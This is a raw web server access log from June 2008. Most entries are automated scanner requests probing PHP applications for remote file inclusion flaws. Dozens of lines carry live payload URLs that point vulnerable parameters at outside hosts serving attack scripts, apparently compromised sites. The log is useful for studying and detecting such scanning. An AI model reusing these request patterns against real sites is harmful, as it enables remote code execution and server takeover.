69.13.27.210 - - [25/Jun/2008:09:27:03 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.213.115 - - [25/Jun/2008:09:28:18 -0700] "GET /logs/access_080201.log/modules/vwar/admin/admin.php?vwar_root=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [25/Jun/2008:09:28:18 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [25/Jun/2008:09:28:18 -0700] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.239.223.69 - - [25/Jun/2008:09:28:46 -0700] "GET /logs/access_080304.log/?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.223.69 - - [25/Jun/2008:09:28:52 -0700] "GET /logs/?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt?? HTTP/1.1" 200 53419 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.52.83 - - [25/Jun/2008:09:28:59 -0700] "GET /blog/index.php/2008/06/05/crestoc-2008-5302008-612008/ HTTP/1.0" 200 7891 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
218.239.223.69 - - [25/Jun/2008:09:28:59 -0700] "GET /?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt?? HTTP/1.1" 200 18410 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.234 - - [25/Jun/2008:09:29:12 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.52.111 - - [25/Jun/2008:09:29:13 -0700] "GET /blog/wp-login.php HTTP/1.0" 200 1844 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
87.106.98.71 - - [25/Jun/2008:09:29:17 -0700] "GET /logs//popup_window.php?site_isp_root=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [25/Jun/2008:09:29:18 -0700] "GET //popup_window.php?site_isp_root=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.223.69 - - [25/Jun/2008:09:29:26 -0700] "GET /logs/access_080307.log/?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.52.111 - - [25/Jun/2008:09:29:28 -0700] "GET /blog/xmlrpc.php HTTP/1.0" 200 43 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:30:21 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:30:22 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.207.104 - - [25/Jun/2008:09:30:25 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.246.63.118 - - [25/Jun/2008:09:30:25 -0700] "GET /logs/access_080327.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.injoyusa.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.207.104 - - [25/Jun/2008:09:30:25 -0700] "GET //skin/zero_vote/error.php?dir=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.246.63.118 - - [25/Jun/2008:09:30:28 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.injoyusa.com/pw.txt? HTTP/1.1" 200 18491 "-" "libwww-perl/5.79" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:09:30:29 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:09:30:29 -0700] "GET //skin/zero_vote/error.php?dir=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:09:30:29 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.20.61.23 - - [25/Jun/2008:09:30:30 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://avast4ever.xpg.com.br/TT?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
213.246.63.118 - - [25/Jun/2008:09:30:30 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.injoyusa.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.213.115 - - [25/Jun/2008:09:30:38 -0700] "GET /logs/access_080127.log/modules/vwar/admin/admin.php?vwar_root=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.22.190 - - [25/Jun/2008:09:30:38 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.51.115 - - [25/Jun/2008:09:30:39 -0700] "GET / HTTP/1.0" 200 18237 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
87.106.101.24 - - [25/Jun/2008:09:31:08 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [25/Jun/2008:09:31:08 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:31:10 -0700] "GET /logs//popup_window.php?site_isp_root=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:31:11 -0700] "GET //popup_window.php?site_isp_root=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.98.71 - - [25/Jun/2008:09:31:12 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [25/Jun/2008:09:31:12 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.195.42.191 - - [25/Jun/2008:09:31:12 -0700] "GET /logs/access_080304.log/?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.195.42.191 - - [25/Jun/2008:09:31:14 -0700] "GET /?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 18439 "-" "libwww-perl/5.803" "www.dmulk.com"
216.195.42.191 - - [25/Jun/2008:09:31:14 -0700] "GET /logs/?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 53419 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.120.178 - - [25/Jun/2008:09:31:55 -0700] "GET /logs/access_080201.log/modules/vwar/admin/admin.php?vwar_root=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [25/Jun/2008:09:31:56 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [25/Jun/2008:09:31:56 -0700] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [25/Jun/2008:09:32:35 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:09:32:54 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:09:32:54 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:33:07 -0700] "GET /logs//popup_window.php?site_isp_root=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:33:07 -0700] "GET //popup_window.php?site_isp_root=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:33:07 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:33:08 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:09:33:18 -0700] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.76.31.154 - - [25/Jun/2008:09:33:29 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Jun/2008:09:33:30 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:33:38 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:33:39 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:09:33:42 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.120.178 - - [25/Jun/2008:09:33:50 -0700] "GET /logs/access_080127.log/modules/vwar/admin/admin.php?vwar_root=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.17.170 - - [25/Jun/2008:09:34:08 -0700] "GET /blog/index.php/2008/04/12/great-day-for-a-ride/trackback/ HTTP/1.0" 200 11510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
212.227.251.172 - - [25/Jun/2008:09:34:12 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.193.226.112 - - [25/Jun/2008:09:34:29 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://dpfbrasilia.100webspace.net/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.193.226.112 - - [25/Jun/2008:09:34:29 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://dpfbrasilia.100webspace.net/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.193.226.112 - - [25/Jun/2008:09:34:30 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://dpfbrasilia.100webspace.net/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:35:00 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:35:00 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
156.17.223.158 - - [25/Jun/2008:09:35:03 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.lachsfarm.de/board//language/ctrl.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
156.17.223.158 - - [25/Jun/2008:09:35:03 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.lachsfarm.de/board//language/ctrl.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
208.80.193.31 - - [25/Jun/2008:09:35:08 -0700] "GET / HTTP/1.0" 200 18237 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.0.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; IEMB3; IEMB3)" "dmulk.com"
217.115.144.54 - - [25/Jun/2008:09:35:13 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.proostjes.be/calendar/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:09:35:14 -0700] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.proostjes.be/calendar/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:09:35:14 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.proostjes.be/calendar/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:09:35:14 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.proostjes.be/calendar/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.180.84.186 - - [25/Jun/2008:09:35:20 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.180.84.186 - - [25/Jun/2008:09:35:21 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:09:35:33 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:09:35:33 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.55.48.7 - - [25/Jun/2008:09:35:50 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.55.48.7 - - [25/Jun/2008:09:35:55 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.55.48.7 - - [25/Jun/2008:09:35:56 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.55.48.7 - - [25/Jun/2008:09:35:56 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.13.27.210 - - [25/Jun/2008:09:36:05 -0700] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.29 - - [25/Jun/2008:09:36:16 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.29 - - [25/Jun/2008:09:36:16 -0700] "GET /tmp/phpQqRBs4 HTTP/1.1" 403 163 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
69.13.27.210 - - [25/Jun/2008:09:36:38 -0700] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.178.146 - - [25/Jun/2008:09:36:39 -0700] "GET /config.php?path_to_root=http://www.geocities.com/coprald/scan/xxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
67.18.241.90 - - [25/Jun/2008:09:36:55 -0700] "GET /logs/access_071219.log/components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/cmd182182/31377.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.18.241.90 - - [25/Jun/2008:09:36:55 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/cmd182182/31377.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.18.241.90 - - [25/Jun/2008:09:37:32 -0700] "GET /logs/access_080118.log/components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/cmd182182/31377.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.22.157 - - [25/Jun/2008:09:37:32 -0700] "GET /logs/access_080125.log HTTP/1.0" 200 674746 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.89.31.213 - - [25/Jun/2008:09:37:55 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.213 - - [25/Jun/2008:09:37:55 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.246.63.118 - - [25/Jun/2008:09:38:32 -0700] "GET /logs/access_080327.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.injoyusa.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.63.118 - - [25/Jun/2008:09:38:34 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.injoyusa.com/pw.txt? HTTP/1.1" 200 18475 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.63.118 - - [25/Jun/2008:09:38:36 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.injoyusa.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:09:38:38 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.20.61.23 - - [25/Jun/2008:09:39:06 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://avast4ever.xpg.com.br/TT?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
69.20.61.23 - - [25/Jun/2008:09:39:07 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://avast4ever.xpg.com.br/TT?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:09:39:22 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://fsm.upsi.edu.my//db/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:09:39:23 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://fsm.upsi.edu.my//db/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.217.176 - - [25/Jun/2008:09:39:42 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.176 - - [25/Jun/2008:09:39:42 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:40:10 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:40:11 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:40:14 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:40:15 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.239.211.19 - - [25/Jun/2008:09:40:29 -0700] "GET /logs//1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.richandrowdyretirement.com/rss.php/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
193.239.211.19 - - [25/Jun/2008:09:40:29 -0700] "GET //1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.richandrowdyretirement.com/rss.php/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:09:40:53 -0700] "GET /logs//popup_window.php?site_isp_root=http://fsm.upsi.edu.my//db/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:09:40:53 -0700] "GET //popup_window.php?site_isp_root=http://fsm.upsi.edu.my//db/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.193.226.112 - - [25/Jun/2008:09:41:03 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://dpfbrasilia.100webspace.net/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.117.152.168 - - [25/Jun/2008:09:41:35 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.117.152.168 - - [25/Jun/2008:09:41:35 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.18.241.90 - - [25/Jun/2008:09:41:37 -0700] "GET /logs/images/evil.php?owned=http://alcohol114.com/dboard/files/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.18.241.90 - - [25/Jun/2008:09:41:37 -0700] "GET /images/evil.php?owned=http://alcohol114.com/dboard/files/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.18.241.90 - - [25/Jun/2008:09:41:39 -0700] "GET /logs/images/evil.php?owned=http://alcohol114.com/dboard/files/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.18.241.90 - - [25/Jun/2008:09:41:40 -0700] "GET /logs/images/evil.php?owned=http://alcohol114.com/dboard/files/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.18.241.90 - - [25/Jun/2008:09:41:40 -0700] "GET /images/evil.php?owned=http://alcohol114.com/dboard/files/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.106.202.240 - - [25/Jun/2008:09:41:47 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.106.202.240 - - [25/Jun/2008:09:41:47 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
